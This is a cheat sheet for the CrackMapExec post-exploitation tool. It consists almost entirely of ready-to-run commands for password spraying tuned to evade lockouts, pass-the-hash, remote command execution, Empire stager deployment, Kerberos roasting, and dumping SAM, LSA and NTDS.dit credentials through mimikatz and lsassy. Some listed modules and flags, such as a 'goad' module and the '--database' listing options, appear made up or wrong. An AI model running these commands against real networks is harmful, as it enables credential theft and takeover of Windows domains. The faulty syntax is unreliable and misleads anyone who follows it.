Appearance
CrackMapExec Cheat Sheet
Overview
CrackMapExec (CME) is a post-exploitation tool designed for penetration testing and red team operations in Windows/Active Directory environments. It's often described as a "Swiss Army knife" for network penetration testing, allowing for enumeration, credential testing, and command execution across multiple protocols.
⚠️ Warning: CrackMapExec is a security testing tool that should only be used in environments where you have explicit permission to do so.
Installation
Using pipx (Recommended)
bash
# Install pipx if not already installed
python3 -m pip install --user pipx
python3 -m pipx ensurepath
# Install CrackMapExec
pipx install crackmapexecOn Kali Linux
bash
sudo apt update
sudo apt install -y crackmapexecFrom GitHub
bash
git clone https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry installUsing Docker
bash
docker pull byt3bl33d3r/crackmapexec
docker run -it --entrypoint=/bin/bash byt3bl33d3r/crackmapexecBasic Usage
General Syntax
bash
crackmapexec <protocol> <target(s)> -u <username> -p <password> [options]Supported Protocols
smb: Server Message Blockwinrm: Windows Remote Managementldap: Lightweight Directory Access Protocolmssql: Microsoft SQL Serverssh: Secure Shellrdp: Remote Desktop Protocolftp: File Transfer Protocol
Target Specification
bash
# Single target
crackmapexec smb 192.168.1.100
# Multiple targets
crackmapexec smb 192.168.1.100,192.168.1.101
# IP range
crackmapexec smb 192.168.1.1-255
# CIDR notation
crackmapexec smb 192.168.1.0/24
# From file
crackmapexec smb targets.txtAuthentication Methods
Username and Password
bash
# Single username and password
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123'
# Multiple usernames
crackmapexec smb 192.168.1.0/24 -u administrator,user1 -p 'Password123'
# Multiple passwords
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123','Welcome1'
# From files
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txtPass-the-Hash
bash
# NTLM hash
crackmapexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'
# Multiple hashes
crackmapexec smb 192.168.1.0/24 -u administrator -H 'hash1' 'hash2'
# From file
crackmapexec smb 192.168.1.0/24 -u administrator -H hashes.txtLocal Authentication
bash
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-authDomain Authentication
bash
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -d DOMAINSMB Protocol Commands
Basic Enumeration
bash
# List shares
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --shares
# List logged-on users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --loggedon-users
# List domain users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --users
# List domain groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --groups
# List local groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-groups
# Get domain password policy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol
# Check for SMB signing
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txtCommand Execution
bash
# Execute command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'
# Execute PowerShell command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'File Operations
bash
# List files in share
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --spider C$ --pattern '*.txt'
# Download file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --get-file 'C:\temp\file.txt' /tmp/file.txt
# Upload file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --put-file /tmp/file.txt 'C:\temp\file.txt'WinRM Protocol Commands
Basic Enumeration
bash
# Check WinRM access
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123'Command Execution
bash
# Execute command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'
# Execute PowerShell command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'LDAP Protocol Commands
Basic Enumeration
bash
# Get domain information
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --domain
# List domain users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --users
# List domain groups
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --groups
# List domain computers
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --computers
# Get domain password policy
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol
# Get domain trusts
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trustsAdvanced Enumeration
bash
# Search for specific attributes
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M maq -o ATTRIBUTES=description
# Search for unconstrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusted-for-delegation
# Search for constrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --allowed-to-delegate
# Search for ASREP roastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --asreproast output.txt
# Search for kerberoastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --kerberoasting output.txtMSSQL Protocol Commands
Basic Enumeration
bash
# Check MSSQL access
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123'
# List databases
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT name FROM master.dbo.sysdatabases'Command Execution
bash
# Execute command
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -x 'whoami'
# Execute query
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT @@version'Module Usage
Module Management
bash
# List available modules
crackmapexec <protocol> --list-modules
# Get module options
crackmapexec <protocol> -M <module> --options
# Use module
crackmapexec <protocol> <target> -u <username> -p <password> -M <module> -o OPTION1=value1 OPTION2=value2Common Modules
Mimikatz
bash
# Dump credentials
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='sekurlsa::logonpasswords'
# Get LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::secrets'
# Get SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::sam'
# Get DCSync
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::dcsync /domain:domain.local /user:krbtgt'Empire
bash
# Generate Empire stager
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M empire_exec -o LISTENER=httpPowerView
bash
# Run PowerView commands
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M powerview -o COMMAND='Get-NetDomain'BloodHound
bash
# Collect BloodHound data
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M bloodhound -o COLLECTION=AllLsassy
bash
# Dump credentials using lsassy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M lsassyEnum_DNS
bash
# Enumerate DNS records
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M enum_dnsGOAD
bash
# Get objects and attributes from domain
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M goadAdvanced Techniques
Password Spraying
bash
# Spray single password against multiple users
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!'
# Spray multiple passwords against single user
crackmapexec smb 192.168.1.0/24 -u administrator -p passwords.txt
# Spray with jitter to avoid lockouts
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!' --continue-on-success --fail-limit 1 --jitter 10Credential Harvesting
bash
# Dump SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --sam
# Dump LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --lsa
# Dump NTDS.dit
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --ntdsDatabase Operations
Initialize Database
bash
crackmapexec smb 192.168.1.0/24 --databaseView Database
bash
# List hosts
crackmapexec smb --database -L
# List credentials
crackmapexec smb --database -C
# Use credentials from database
crackmapexec smb 192.168.1.0/24 --database -id 1Common Options
| Option | Description |
|---|---|
-h, --help | Show help message and exit |
-t THREADS | Set number of concurrent threads (default: 100) |
--timeout TIMEOUT | Set timeout for connections (default: 5 seconds) |
--verbose | Enable verbose output |
--debug | Enable debug output |
--continue-on-success | Continue authentication attempts even after success |
--no-bruteforce | No bruteforce, only use provided credentials |
--fail-limit LIMIT | Number of failed login attempts before giving up on a host |
--jitter JITTER | Add random delay between authentication attempts (in seconds) |
--local-auth | Authenticate using local accounts instead of domain |
-d, --domain DOMAIN | Domain to authenticate to |
--no-output | Do not display output |
--output-file FILE | Write output to file |
--log | Enable logging to file (default: ~/.cme/logs/) |
Protocol-Specific Options
SMB Options
| Option | Description |
|---|---|
--shares | List available shares |
--sessions | List active sessions |
--disks | List disks |
--loggedon-users | List logged-on users |
--users | List domain users |
--groups | List domain groups |
--local-groups | List local groups |
--pass-pol | Get password policy |
--rid-brute [MAX_RID] | Enumerate users by bruteforcing RID |
--sam | Dump SAM hashes |
--lsa | Dump LSA secrets |
--ntds | Dump NTDS.dit |
--exec-method {smbexec,wmiexec,mmcexec,atexec} | Method to execute commands |
LDAP Options
| Option | Description |
|---|---|
--users | List domain users |
--groups | List domain groups |
--computers | List domain computers |
--domain | Get domain information |
--pass-pol | Get password policy |
--trusts | Get domain trusts |
--asreproast [OUTFILE] | Get AS-REP roastable users |
--kerberoasting [OUTFILE] | Get kerberoastable users |
--trusted-for-delegation | Get users/computers with unconstrained delegation |
--allowed-to-delegate | Get users/computers with constrained delegation |
WinRM Options
| Option | Description |
|---|---|
--port [PORT] | WinRM port (default: 5985) |
--ssl | Use SSL for WinRM |
MSSQL Options
| Option | Description |
|---|---|
--port [PORT] | MSSQL port (default: 1433) |
-q QUERY | Execute SQL query |